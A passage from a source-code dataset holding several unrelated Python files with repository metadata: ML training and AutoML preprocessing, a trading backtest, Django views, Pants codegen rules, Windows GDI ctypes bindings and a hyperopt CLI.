count += 1 # update count
if count >= patience: # if count reach patience -> early stop
print('Patience: '+str(count)+'/'+str(patience)+' -> Early stopping')
break
else:
print('Patience: '+str(count)+'/'+str(patience))
else:
best_score = acc # update best score
count = 0 # set/reset count to 0
torch.save(model.state_dict(), str(counter)+'_model.ckpt') # save weights
print('Model saved')
# Save accuracy value for the current epoch
val_acc.append(acc)
val_loss.append(round(v_loss.item(), 4))
# Save loss and accuracy
np.save(str(counter)+'_learning_rate.npy', lr_list)
np.save(str(counter)+'_train_acc.npy', train_acc)
np.save(str(counter)+'_train_loss.npy', train_loss)
np.save(str(counter)+'_val_acc.npy', val_acc)
np.save(str(counter)+'_val_loss.npy', val_loss)
# Save result in a dataframe
all_res.append({'N. layers': num_layers, 'Batch Normalization': batch_norm_layer, 'Activation': str(activation_func),
'Dropout': drop_layer, 'Optimizer': str(opt), 'Train acc': acc_tr, 'Val acc': (100 * best_score)})
out_rs = pd.DataFrame(all_res)
out_rs.to_csv('MLP_grid_search.csv', index=False)
print('Grid search ended and results saved')
| 38.402027 | 127 | 0.590833 | 1,360 | 11,367 | 4.783824 | 0.227206 | 0.015217 | 0.015063 | 0.003074 | 0.286658 | 0.235629 | 0.188749 | 0.150015 | 0.112512 | 0.112512 | 0 | 0.014098 | 0.251166 | 11,367 | 295 | 128 | 38.532203 | 0.750235 | 0.259083 | 0 | 0.193717 | 0 | 0 | 0.084035 | 0.008175 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031414 | false | 0 | 0.04712 | 0 | 0.104712 | 0.04712 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cf472f4ca4830340edb61545a9592eaf91f9937 | 506 | py | Python | quanttrade/test/SmaTest.py | dingmingliu/quanttrade | 2d9eaf9f2339a51458ef1e130c60b0132d9e57bb | [
"Apache-2.0"
] | null | null | null | quanttrade/test/SmaTest.py | dingmingliu/quanttrade | 2d9eaf9f2339a51458ef1e130c60b0132d9e57bb | [
"Apache-2.0"
] | null | null | null | quanttrade/test/SmaTest.py | dingmingliu/quanttrade | 2d9eaf9f2339a51458ef1e130c60b0132d9e57bb | [
"Apache-2.0"
] | 1 | 2021-10-02T12:22:30.000Z | 2021-10-02T12:22:30.000Z | __author__ = 'tyler'
import bt
#%pylab inline
# download data
data = bt.get('aapl,msft', start='2013-01-01')
data.head()
import pandas as pd
# a rolling mean is a moving average, right?
sma = data.rolling(50).mean()  # pd.rolling_mean was removed in modern pandas
s = bt.Strategy('above50sma', [ bt.algos.SelectWhere(data > sma),
bt.algos.WeighEqually(),
bt.algos.Rebalance()])
# now we create the Backtest
t = bt.Backtest(s, data)
# and let's run it!
res = bt.run(t)
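# If running interactively, the Result object can be inspected further, e.g.
# res.display() or res.plot() (assuming the standard bt Result API).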
| 25.3 | 66 | 0.58498 | 71 | 506 | 4.098592 | 0.633803 | 0.072165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033058 | 0.282609 | 506 | 19 | 67 | 26.631579 | 0.768595 | 0.227273 | 0 | 0 | 0 | 0 | 0.092896 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cf5db2bf88364cfebbc87d0de7355ee48538556 | 778 | py | Python | mainsite/views.py | Anthlay/mblog | 2f19f7eba6c1b77f829c88373f9ecf94de57024a | [
"Apache-2.0"
] | null | null | null | mainsite/views.py | Anthlay/mblog | 2f19f7eba6c1b77f829c88373f9ecf94de57024a | [
"Apache-2.0"
] | 4 | 2020-02-12T01:14:04.000Z | 2021-06-10T21:48:09.000Z | mainsite/views.py | Anthlay/mblog | 2f19f7eba6c1b77f829c88373f9ecf94de57024a | [
"Apache-2.0"
] | null | null | null | from datetime import datetime
from django.shortcuts import render, redirect
from django.http import HttpResponse
from .models import Post
# Create your views here
def homepage(request):
posts = Post.objects.all()
post_lists = list()
for count,post in enumerate(posts):
posts = Post.objects.all()
now = datetime.now()
return render(request,'index.html',locals())
#post_lists.append("No.{}:".format(str(count))+str(post)+"<br>")
#post_lists.append("<small>"+str(post.body)+"</small><br><br>")
#return HttpResponse(post_lists)
def showpost(request,slug):
try:
post = Post.objects.get(slug=slug)
if post != None:
return render(request,'post.html',locals())
except Post.DoesNotExist:
return redirect('/') | 33.826087 | 72 | 0.650386 | 99 | 778 | 5.070707 | 0.464646 | 0.071713 | 0.063745 | 0.075697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.201799 | 778 | 23 | 73 | 33.826087 | 0.808374 | 0.228792 | 0 | 0.111111 | 0 | 0 | 0.033557 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cfd44b4f9b3f25b6ece98512e0b6a0746c58433 | 2,680 | py | Python | src/python/pants/backend/codegen/thrift/apache/java/rules.py | wimax-grapl/pants | 0aabd417a772ea4e39999c4415c67db40de679a4 | [
"Apache-2.0"
] | null | null | null | src/python/pants/backend/codegen/thrift/apache/java/rules.py | wimax-grapl/pants | 0aabd417a772ea4e39999c4415c67db40de679a4 | [
"Apache-2.0"
] | 28 | 2021-12-27T15:53:46.000Z | 2022-03-23T11:01:42.000Z | src/python/pants/backend/codegen/thrift/apache/java/rules.py | wimax-grapl/pants | 0aabd417a772ea4e39999c4415c67db40de679a4 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pants.backend.codegen.thrift.apache.java import subsystem
from pants.backend.codegen.thrift.apache.java.subsystem import ApacheThriftJavaSubsystem
from pants.backend.codegen.thrift.apache.rules import (
GeneratedThriftSources,
GenerateThriftSourcesRequest,
)
from pants.backend.codegen.thrift.target_types import ThriftDependenciesField, ThriftSourceField
from pants.backend.java.target_types import JavaSourceField
from pants.engine.addresses import Addresses, UnparsedAddressInputs
from pants.engine.fs import AddPrefix, Digest, Snapshot
from pants.engine.internals.selectors import Get
from pants.engine.rules import collect_rules, rule
from pants.engine.target import (
GeneratedSources,
GenerateSourcesRequest,
InjectDependenciesRequest,
InjectedDependencies,
)
from pants.engine.unions import UnionRule
from pants.source.source_root import SourceRoot, SourceRootRequest
from pants.util.logging import LogLevel
class GenerateJavaFromThriftRequest(GenerateSourcesRequest):
input = ThriftSourceField
output = JavaSourceField
@rule(desc="Generate Java from Thrift", level=LogLevel.DEBUG)
async def generate_java_from_thrift(
request: GenerateJavaFromThriftRequest,
thrift_java: ApacheThriftJavaSubsystem,
) -> GeneratedSources:
result = await Get(
GeneratedThriftSources,
GenerateThriftSourcesRequest(
thrift_source_field=request.protocol_target[ThriftSourceField],
lang_id="java",
lang_options=thrift_java.gen_options,
lang_name="Java",
),
)
source_root = await Get(
SourceRoot, SourceRootRequest, SourceRootRequest.for_target(request.protocol_target)
)
source_root_restored = (
await Get(Snapshot, AddPrefix(result.snapshot.digest, source_root.path))
if source_root.path != "."
else await Get(Snapshot, Digest, result.snapshot.digest)
)
return GeneratedSources(source_root_restored)
class InjectApacheThriftJavaDependencies(InjectDependenciesRequest):
inject_for = ThriftDependenciesField
@rule
async def inject_apache_thrift_java_dependencies(
_: InjectApacheThriftJavaDependencies, thrift_java: ApacheThriftJavaSubsystem
) -> InjectedDependencies:
addresses = await Get(Addresses, UnparsedAddressInputs, thrift_java.runtime_dependencies)
return InjectedDependencies(addresses)
def rules():
return (
*collect_rules(),
*subsystem.rules(),
UnionRule(GenerateSourcesRequest, GenerateJavaFromThriftRequest),
)
| 34.805195 | 96 | 0.776493 | 259 | 2,680 | 7.899614 | 0.332046 | 0.057185 | 0.043988 | 0.044966 | 0.069404 | 0.05523 | 0.038123 | 0 | 0 | 0 | 0 | 0.002646 | 0.153731 | 2,680 | 76 | 97 | 35.263158 | 0.899471 | 0.047015 | 0 | 0.032787 | 0 | 0 | 0.013328 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016393 | false | 0 | 0.213115 | 0.016393 | 0.360656 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cfeca7d709f2e090e6854d324dfeda0011d1640 | 11,124 | py | Python | hana_automl/preprocess/preprocessor.py | dan0nchik/SAP-HANA-AutoML | 68cde80bd7fbfc751fb56062af30aec9238f9fb3 | [
"MIT"
] | 59 | 2021-01-10T18:35:38.000Z | 2022-02-28T16:49:06.000Z | hana_automl/preprocess/preprocessor.py | u1810291/SAP-HANA-AutoML | 06200bd1f813916fc81eb1ccb0ed0b1275e22945 | [
"MIT"
] | 3 | 2021-02-01T19:33:39.000Z | 2021-06-29T08:32:33.000Z | hana_automl/preprocess/preprocessor.py | u1810291/SAP-HANA-AutoML | 06200bd1f813916fc81eb1ccb0ed0b1275e22945 | [
"MIT"
] | 10 | 2021-06-18T12:35:34.000Z | 2021-12-28T18:48:36.000Z | import copy
import math
from hana_ml import DataFrame
from hana_ml.algorithms.pal.neighbors import KNNRegressor
from hana_ml.algorithms.pal.preprocessing import (
Imputer,
FeatureNormalizer,
variance_test,
)
from hana_automl.algorithms.classification.decisiontreecls import DecisionTreeCls
from hana_automl.algorithms.classification.gradboostcls import GBCls
from hana_automl.algorithms.classification.hybgradboostcls import HGBCls
from hana_automl.algorithms.classification.kneighborscls import KNeighborsCls
from hana_automl.algorithms.classification.logregressioncls import LogRegressionCls
from hana_automl.algorithms.classification.mlpcl import MLPcls
from hana_automl.algorithms.classification.naive_bayes import NBayesCls
from hana_automl.algorithms.classification.rdtclas import RDTCls
from hana_automl.algorithms.classification.svc import SVCls
from hana_automl.algorithms.regression.decisiontreereg import DecisionTreeReg
from hana_automl.algorithms.regression.expreg import ExponentialReg
from hana_automl.algorithms.regression.glmreg import GLMReg
from hana_automl.algorithms.regression.gradboostreg import GBReg
from hana_automl.algorithms.regression.hybgradboostreg import HGBReg
from hana_automl.algorithms.regression.kneighborsreg import KNeighborsReg
from hana_automl.algorithms.regression.mlpreg import MLPreg
from hana_automl.algorithms.regression.rdtreg import RDTReg
from hana_automl.algorithms.regression.svr import SVReg
from hana_automl.utils.error import PreprocessError
class Preprocessor:
def __init__(self):
self.clsdict = {
"KNeighborsClassifier": KNeighborsCls(),
"DecisionTreeClassifier": DecisionTreeCls(),
# "LogisticRegressionClassifier": log,
"NaiveBayesClassifier": NBayesCls(),
"MLPClassifier": MLPcls(),
"SupportVectorClassifier": SVCls(),
"RandomDecisionTreeClassifier": RDTCls(),
"GradientBoostingClassifier": GBCls(),
"HybridGradientBoostingClassifier": HGBCls(),
}
self.regdict = {
"DecisionTreeRegressor": DecisionTreeReg(),
# "GLMRegressor": GLMReg(),
"ExponentialRegressor": ExponentialReg(),
"MLPRegressor": MLPreg(),
"Random_Decision_Tree_Regressor": RDTReg(),
"SupportVectorRegressor": SVReg(),
"GradientBoostingRegressor": GBReg(),
"HybridGradientBoostingRegressor": HGBReg(),
"KNNRegressor": KNeighborsReg(),
}
def autoimput(
self,
df: DataFrame = None,
target: str = None,
id: str = None,
imputer_num_strategy: str = None,
strategy_by_col: str = None,
normalizer_strategy: str = None,
normalizer_z_score_method: str = None,
normalize_int: bool = None,
categorical_list: list = None,
normalization_excp: list = None,
):
if df is None:
raise PreprocessError("Enter not null data!")
impute = Imputer(strategy=imputer_num_strategy)
if categorical_list is not None:
categorical_list = list(set(categorical_list))
if target is None:
cols = df.columns
for column in categorical_list:
if column not in cols:
categorical_list.remove(column)
if strategy_by_col is not None:
result = impute.fit_transform(
df,
categorical_variable=categorical_list,
strategy_by_col=strategy_by_col,
)
else:
result = impute.fit_transform(
df,
categorical_variable=categorical_list,
)
else:
if strategy_by_col is not None:
result = impute.fit_transform(df, strategy_by_col=strategy_by_col)
else:
result = impute.fit_transform(df)
result = self.normalize(
result,
normalizer_strategy,
id,
target,
categorical_list=categorical_list,
norm_int=normalize_int,
z_score_method=normalizer_z_score_method,
normalization_excp=normalization_excp,
)
return result
def removecolumns(self, columns: list, df: DataFrame):
if df is None:
raise PreprocessError("Enter not null data!")
if columns is not None:
df = df.drop(columns)
return df
def normalize(
self,
df: DataFrame,
method: str,
id: str,
target: str,
categorical_list: list = None,
norm_int: bool = False,
z_score_method: str = "mean-standard",
normalization_excp=None,
):
if df is None:
raise PreprocessError("Enter not null data!")
if method == "min-max":
fn = FeatureNormalizer(method="min-max", new_max=1.0, new_min=0.0)
elif method == "z-score":
fn = FeatureNormalizer(method="z-score", z_score_method=z_score_method)
else:
fn = FeatureNormalizer(method="decimal")
col_list = df.columns
remove_list = list()
if categorical_list is not None and len(categorical_list) > 0:
for i in categorical_list:
remove_list.append(i)
else:
categorical_list = []
dt = df.dtypes()
if norm_int:
int_lst = []
for i in dt:
if target is None:
targ_variant = True
else:
targ_variant = i[0] != target
if (
i[0] != id
and (i[1] in ["INT", "SMALLINT", "MEDIUMINT", "INTEGER", "BIGINT"])
and targ_variant
and not (i[0] in categorical_list)
):
int_lst.append(i[0])
if len(int_lst) > 0:
df = df.cast(int_lst, "DOUBLE")
dt = df.dtypes()
for i in dt:
if target is None:
targ_variant = False
else:
targ_variant = i[0] == target
if i[0] == id or targ_variant or i[1] in ["INT", "CHAR", "VARCHAR"]:
if not i[0] in remove_list:
remove_list.append(i[0])
if normalization_excp is not None:
for i in normalization_excp:
if i not in remove_list:
remove_list.append(i)
if len(remove_list) > 0:
for i in remove_list:
col_list.remove(i)
if len(col_list) > 0:
trn: DataFrame = fn.fit_transform(df, key=id, features=col_list)
trn = trn.rename_columns({id: "TEMP_ID"})
df = df.drop(col_list)
df = (
df.alias("SOURCE")
.join(
trn.alias("NORMALIZED"),
f"NORMALIZED.TEMP_ID = SOURCE.{id}",
how="inner",
)
.drop(["TEMP_ID"])
)
return df
def autoremovecolumns(self, df: DataFrame):
for column in df.columns:
if (
"object" == str(df[column].dtype)
and df[column].nunique() > df[column].shape[0] / 100 * 7
) or (df[column].nunique() > df[column].shape[0] / 100 * 9):
df = df.drop([column])
return df
def drop_outers(self, df: DataFrame, id: str, target: str, cat_list: list):
col_list = df.columns
if cat_list is None:
cat_list = []
cat_list.append(target)
cat_list.append(id)
col_list = list(filter(lambda column: column not in cat_list, col_list))
data_types = df.dtypes()
for i in data_types:
if i[0] in col_list:
if i[1] == "CHAR" or i[1] == "VARCHAR":
col_list.remove(i[0])
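# variance_test flags values more than sigma_num standard deviations from the
# column mean; the join below keeps only rows that were not flagged (DROP = 0).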
for i in col_list:
df = (
variance_test(data=df, sigma_num=3.0, key=id, data_col=i)[0]
.rename_columns(["ID_TEMP", "DROP"])
.join(df, "ID_TEMP=" + id)
.deselect("ID_TEMP")
.filter("DROP = 0")
.deselect("DROP")
)
return df
def set_task(self, data, target: str, task: str, algo_exceptions=None):
if algo_exceptions is None:
algo_exceptions = []
if task is None:
if data.train.distinct(target).count() < 10:
task = "cls"
else:
task = "reg"
if task == "cls":
if data.binomial:
vals = data.train.select(data.target).collect()[data.target].unique()
log = LogRegressionCls(
binominal=data.binomial, class_map0=vals[0], class_map1=vals[1]
)
else:
log = LogRegressionCls(binominal=data.binomial)
self.clslist = [
DecisionTreeCls(),
KNeighborsCls(),
# log,
NBayesCls(),
MLPcls(),
SVCls(),
RDTCls(),
GBCls(),
HGBCls(),
]
clslist = [i for i in self.clslist if i.title not in algo_exceptions]
clsdict = {
key: value
for key, value in self.clsdict.items()
if key not in algo_exceptions
}
return clslist, "cls", clsdict
else:
self.reglist = [
DecisionTreeReg(),
# GLMReg(),
KNeighborsReg(),
MLPreg(),
SVReg(),
RDTReg(),
GBReg(),
HGBReg(),
]
reglist = [i for i in self.reglist if i.title not in algo_exceptions]
regdict = {
key: value
for key, value in self.regdict.items()
if key not in algo_exceptions
}
return reglist, "reg", regdict
@staticmethod
def check_binomial(df: DataFrame, target: str):
if target is None or df is None:
raise PreprocessError("Enter correct data for check!")
if df.distinct(target).count() < 3:
return True
else:
return False
@staticmethod
def check_normalization_exceptions(df, id, target, categorical_list):
excpt_list = []
dts = df.columns
dts.remove(id)
dts.remove(target)
if categorical_list is None:
categorical_list = []
for dt in dts:
if (
df.is_numeric(dt)
and dt not in categorical_list
and df.distinct(dt).count() < 3
):
excpt_list.append(dt)
if len(excpt_list) < 1:
return None
else:
return excpt_list
| 36.834437 | 87 | 0.548993 | 1,149 | 11,124 | 5.165361 | 0.182768 | 0.029655 | 0.044819 | 0.072789 | 0.304297 | 0.159225 | 0.144903 | 0.117607 | 0.106824 | 0.081887 | 0 | 0.006356 | 0.363538 | 11,124 | 301 | 88 | 36.956811 | 0.831921 | 0.006922 | 0 | 0.216783 | 0 | 0 | 0.061945 | 0.023546 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031469 | false | 0 | 0.083916 | 0 | 0.157343 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cffe20ef35dd83ae3e95a578a5a23bf44a0fc19 | 2,534 | py | Python | cwinsdk/um/wingdi.py | Vlastbia/ctypes-windows-sdk | ccb2c7e83086840a620358507cac5c3fccc7e8af | [
"ISC"
] | null | null | null | cwinsdk/um/wingdi.py | Vlastbia/ctypes-windows-sdk | ccb2c7e83086840a620358507cac5c3fccc7e8af | [
"ISC"
] | null | null | null | cwinsdk/um/wingdi.py | Vlastbia/ctypes-windows-sdk | ccb2c7e83086840a620358507cac5c3fccc7e8af | [
"ISC"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
from ctypes import POINTER, c_int, Structure
from ctypes.wintypes import LPCSTR, HANDLE, LPCWSTR, DWORD, BOOL, UINT, LPVOID, WORD, LONG, BYTE
from .. import windll
HDC = HANDLE
HGDIOBJ = HANDLE
HBITMAP = HANDLE
DIB_RGB_COLORS = 0
HORZRES = 8
VERTRES = 10
SRCCOPY = 0x00CC0020
CAPTUREBLT = 0x40000000
from warnings import warn
warn("Don't use last parameter of `CreateDCA` or `CreateDCW`, as `DEVMODEA` and `DEVMODEW` are not defined correctly.")
DEVMODEA = c_int
DEVMODEW = c_int
class RGBQUAD(Structure):
_fields_ = [
("rgbBlue", BYTE),
("rgbGreen", BYTE),
("rgbRed", BYTE),
("rgbReserved", BYTE),
]
class BITMAPCOREHEADER(Structure):
_fields_ = [
("bcSize", DWORD),
("bcWidth", WORD),
("bcHeight", WORD),
("bcPlanes", WORD),
("bcBitCount", WORD),
]
class BITMAPINFOHEADER(Structure):
_fields_ = [
("biSize", DWORD),
("biWidth", LONG),
("biHeight", LONG),
("biPlanes", WORD),
("biBitCount", WORD),
("biCompression", DWORD),
("biSizeImage", DWORD),
("biXPelsPerMeter", LONG),
("biYPelsPerMeter", LONG),
("biClrUsed", DWORD),
("biClrImportant", DWORD),
]
class BITMAPINFO(Structure):
_fields_ = [
("bmiHeader", BITMAPINFOHEADER),
("bmiColors", RGBQUAD*1),
]
# functions
BitBlt = windll.Gdi32.BitBlt
BitBlt.argtypes = [HDC, c_int, c_int, c_int, c_int, HDC, c_int, c_int, DWORD]
BitBlt.restype = BOOL
CreateCompatibleBitmap = windll.Gdi32.CreateCompatibleBitmap
CreateCompatibleBitmap.argtypes = [HDC, c_int, c_int]
CreateCompatibleBitmap.restype = HBITMAP
CreateCompatibleDC = windll.Gdi32.CreateCompatibleDC
CreateCompatibleDC.argtypes = [HDC]
CreateCompatibleDC.restype = HDC
CreateDCA = windll.Gdi32.CreateDCA
CreateDCA.argtypes = [LPCSTR, LPCSTR, LPCSTR, POINTER(DEVMODEA)]
CreateDCA.restype = HDC
CreateDCW = windll.Gdi32.CreateDCW
CreateDCW.argtypes = [LPCWSTR, LPCWSTR, LPCWSTR, POINTER(DEVMODEW)]
CreateDCW.restype = HDC
DeleteDC = windll.Gdi32.DeleteDC
DeleteDC.argtypes = [HDC]
DeleteDC.restype = BOOL
DeleteObject = windll.Gdi32.DeleteObject
DeleteObject.argtypes = [HGDIOBJ]
DeleteObject.restype = BOOL
GetDeviceCaps = windll.Gdi32.GetDeviceCaps
GetDeviceCaps.argtypes = [HDC, c_int]
GetDeviceCaps.restype = c_int
GetDIBits = windll.Gdi32.GetDIBits
GetDIBits.argtypes = [HDC, HBITMAP, UINT, UINT, LPVOID, POINTER(BITMAPINFO), UINT]
GetDIBits.restype = c_int
SelectObject = windll.Gdi32.SelectObject
SelectObject.argtypes = [HDC, HGDIOBJ]
SelectObject.restype = HGDIOBJ
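# Usage sketch (assumed GDI screen-capture sequence; names below are illustrative):
# hdc = CreateDCW("DISPLAY", None, None, None)
# mem_dc = CreateCompatibleDC(hdc)
# bmp = CreateCompatibleBitmap(hdc, width, height)
# SelectObject(mem_dc, bmp)
# BitBlt(mem_dc, 0, 0, width, height, hdc, 0, 0, SRCCOPY | CAPTUREBLT)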
| 24.843137 | 119 | 0.741121 | 280 | 2,534 | 6.596429 | 0.360714 | 0.030319 | 0.013535 | 0.021657 | 0.030861 | 0.024905 | 0 | 0 | 0 | 0 | 0 | 0.018653 | 0.132597 | 2,534 | 101 | 120 | 25.089109 | 0.821656 | 0.003552 | 0 | 0.05 | 0 | 0.0125 | 0.125248 | 0 | 0 | 0 | 0.007927 | 0 | 0 | 1 | 0 | false | 0 | 0.075 | 0 | 0.175 | 0.0125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1400e05a81e61584f76a1b7de9750c733259c909 | 1,081 | py | Python | S1/TP7/ex5.py | HerbeMalveillante/ecole | bebbc73cd678c58c9cd40389ea1cf229a0200308 | [
"MIT"
] | null | null | null | S1/TP7/ex5.py | HerbeMalveillante/ecole | bebbc73cd678c58c9cd40389ea1cf229a0200308 | [
"MIT"
] | null | null | null | S1/TP7/ex5.py | HerbeMalveillante/ecole | bebbc73cd678c58c9cd40389ea1cf229a0200308 | [
"MIT"
] | null | null | null | dico = {25: 4, 8: 1, 12: 2, 3: 5}
print(dico)
print("5 dans dico ?", 5 in dico)
print("25 dans dico ?", 25 in dico)
dico[9] = 1
dico[8] = 2
print(dico)
del dico[25]
print(dico)
print("-" * 10)
inventaire = {"orange": 378, "pomme": 545, "banane": 422, "poire": 269}
def checkStock():
fruit = input("Entrez un fruit : ")
print(
f"Il y a {inventaire[fruit]} {fruit}s."
if fruit in inventaire
else "Desolé, le fruit n'est pas en stock"
)
checkStock()
def ajouteStock():
fruit, stock = input(
"Entrez un fruit et son stock séparés par un espace : "
).split()
stock = int(stock)
if fruit in inventaire and stock != inventaire[fruit]:
print(
"Erreur : le fruit est déjà présent dans l'inventaire avec un stock différent"
)
return
inventaire[fruit] = stock
def supprimerStock():
fruit = input("Entrez un fruit : ")
if fruit not in inventaire:
print("Le fruit n'est pas dans l'inventaire")
return
del inventaire[fruit]
ajouteStock()
supprimerStock()
| 21.196078 | 90 | 0.603145 | 151 | 1,081 | 4.317881 | 0.410596 | 0.092025 | 0.059816 | 0.082822 | 0.113497 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04557 | 0.269195 | 1,081 | 50 | 91 | 21.62 | 0.779747 | 0 | 0 | 0.236842 | 0 | 0 | 0.297872 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0 | 0 | 0 | 0.131579 | 0.236842 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
14026ffd736cbe43208ce8862e478324d4c76ffc | 2,176 | py | Python | rampwf/hyperopt/cli/hyperopt.py | albertcthomas/ramp-workflow | aee62742314f95ebcb3f226e535ff4ad64e88024 | [
"BSD-3-Clause"
] | 1 | 2020-12-03T12:22:22.000Z | 2020-12-03T12:22:22.000Z | rampwf/hyperopt/cli/hyperopt.py | martin1tab/ramp-workflow | aee62742314f95ebcb3f226e535ff4ad64e88024 | [
"BSD-3-Clause"
] | null | null | null | rampwf/hyperopt/cli/hyperopt.py | martin1tab/ramp-workflow | aee62742314f95ebcb3f226e535ff4ad64e88024 | [
"BSD-3-Clause"
] | null | null | null | import click
from ..hyperopt import run_hyperopt
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
@click.command(context_settings=CONTEXT_SETTINGS)
@click.option('--submission', default='starting_kit', show_default=True,
help='The kit to hyperopt. It should be located in the '
'"submissions" folder of the starting kit.')
@click.option('--ramp-kit-dir', default='.', show_default=True,
help='Root directory of the ramp-kit to hyperopt.')
@click.option('--ramp-data-dir', default='.', show_default=True,
help='Directory containing the data. This directory should '
'contain a "data" folder.')
@click.option('--ramp-submission-dir', default='submissions',
show_default=True,
help='Directory where the submissions are stored. It is the '
'directory (typically called "submissions" in the ramp-kit) '
'that contains the individual submission subdirectories.')
@click.option('--engine', default='random', show_default=True,
help='The name of the hyperopt engine, e.g., "random".')
@click.option('--n-iter', default=10, show_default=True,
help='The number of hyperopt iterations, passed to the '
'engine. The granularity is per cv fold, so if you want to '
'fully test 7 hyperparameter combinations for example with the '
'random engine and you have 8 CV folds, you should enter '
'--n-iter 56')
@click.option('--save-best', is_flag=True, default=True,
show_default=True,
help='Specify this flag to create a <submission>_hyperopt '
'in the "submissions" dir with the best submission.')
def main(submission, ramp_kit_dir, ramp_data_dir, ramp_submission_dir,
engine, n_iter, save_best):
"""Hyperopt a submission."""
run_hyperopt(
ramp_kit_dir=ramp_kit_dir, ramp_data_dir=ramp_data_dir,
ramp_submission_dir=ramp_submission_dir, submission=submission,
engine_name=engine, n_iter=n_iter, save_best=save_best)
def start():
main()
if __name__ == '__main__':
start()
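# Example CLI usage (assumed invocation; flag names match the options above):
# python hyperopt.py --submission starting_kit --engine random --n-iter 56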
| 44.408163 | 78 | 0.654871 | 280 | 2,176 | 4.910714 | 0.317857 | 0.064 | 0.076364 | 0.096727 | 0.180364 | 0.105455 | 0.063273 | 0 | 0 | 0 | 0 | 0.003578 | 0.22932 | 2,176 | 48 | 79 | 45.333333 | 0.816339 | 0.01011 | 0 | 0.051282 | 0 | 0 | 0.419926 | 0.019553 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.051282 | 0 | 0.102564 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
14027a2ddc57fcac5fad84f5b3665608869fa996 | 3,675 | py | Python | deployments/views.py | makaimc/pfisdi | 45e897b374d50e2f5385f15cbf318da0e17900f7 | [
"MIT"
] | 2 | 2015-01-05T21:09:24.000Z | 2015-07-31T16:52:38.000Z | deployments/views.py | makaimc/pfisdi | 45e897b374d50e2f5385f15cbf318da0e17900f7 | [
"MIT"
] | null | null | null | deployments/views.py | makaimc/pfisdi | 45e897b374d50e2f5385f15cbf318da0e17900f7 | [
"MIT"
] | null | null | null | from django.http import HttpResponseRedirect
from django.template import RequestContext
from django.shortcuts import render_to_response, get_object_or_404
from django.core.context_processors import csrf
from django.core.urlresolvers import reverse
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.conf import settings
from common import _slugit
from projects.models import Project
from deployments.models import CloudProvider, Deployment
from deployments.forms import AssociateDeploymentForm
TEMPLATE_PATH = 'deployments/'
def _createParams(req):
p = {'breadcrumbs': [{reverse('deployments'): 'Deployments'}],
'is_deployments': True, 'nav_projects': Project.objects.filter( \
owner=req.user).exclude(production_url__exact='')}
p.update(csrf(req))
p['deployments'] = Deployment.objects.filter(owner=req.user)
return p
@login_required
def home(req):
p = _createParams(req)
return render_to_response(TEMPLATE_PATH + 'home.html', p,
context_instance=RequestContext(req))
@login_required
def deployment(req, slug=''):
if req.method == 'GET':
p = _createParams(req)
deployment = get_object_or_404(Deployment, slug=slug)
p['form'] = AssociateDeploymentForm(instance=deployment)
p['slug'] = deployment.slug
